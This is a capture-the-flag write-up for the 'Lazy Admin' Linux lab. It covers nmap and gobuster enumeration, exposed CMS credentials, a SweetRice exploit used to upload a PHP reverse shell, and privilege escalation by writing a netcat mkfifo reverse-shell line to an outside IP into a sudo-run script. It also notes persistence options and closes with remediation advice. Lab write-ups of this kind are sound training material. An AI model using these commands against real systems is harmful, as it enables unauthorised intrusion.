[Linux] Lazy Admin

Reconnaissance

sudo nmap 10.10.230.22
sudo nmap -A -p 22,80, 10.10.230.22

Enumeration

HTTP

gobuster dir -u http://10.10.230.22/ -w /usr/share/wordlists/dirb/common.txt

gobuster dir -u http://10.10.230.22/content -w /usr/share/wordlists/dirb/common.txt

On the webpage at /inc, there is a database containing some credentials.

CrackStation helps us decode the password.

This password helps us connect to the password-protected page at /as. Credentials: manager / Password123.

Vulnerability research

the website was built with the SweetRice CMS. We can look for vulnerabilities for that CMS.

searchsploit SweetRice

Exploitation

We used the exploit 40700.html to gain remote code execution (RCE)

searchsploit -m php/webapps/40700.html

Following the exploit, upload a PHP-RCE at http://10.10.230.22/content/as/?type=ad.

 cp /usr/share/webshells/php/php-reverse-shell.php .
 nano php-reverse-shell.php

nc -nlvp 1234

We then set a stable shell and get the user flag.

Privilege escalation

sudo -l

We have permission to modify /etc/copy.sh, which establishes a reverse shell to an IP address. We set it to our own local IP address to receive the reverse shell.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.167.85 4321 >/tmp/f" > /etc/copy.sh

Persistence

We can change the password of the user itguy or create a new user on the machine.

Remediation

The database should not be publicly accessible.
The admin password should be strong, hashed with a secure algorithm, and salted or peppered.
Update the vulnerable CMS.
File access rights should be reviewed regularly, and the principle of least privilege should be applied."

Previous[Linux] Agent Sudo NextIAM

Last updated 8 months ago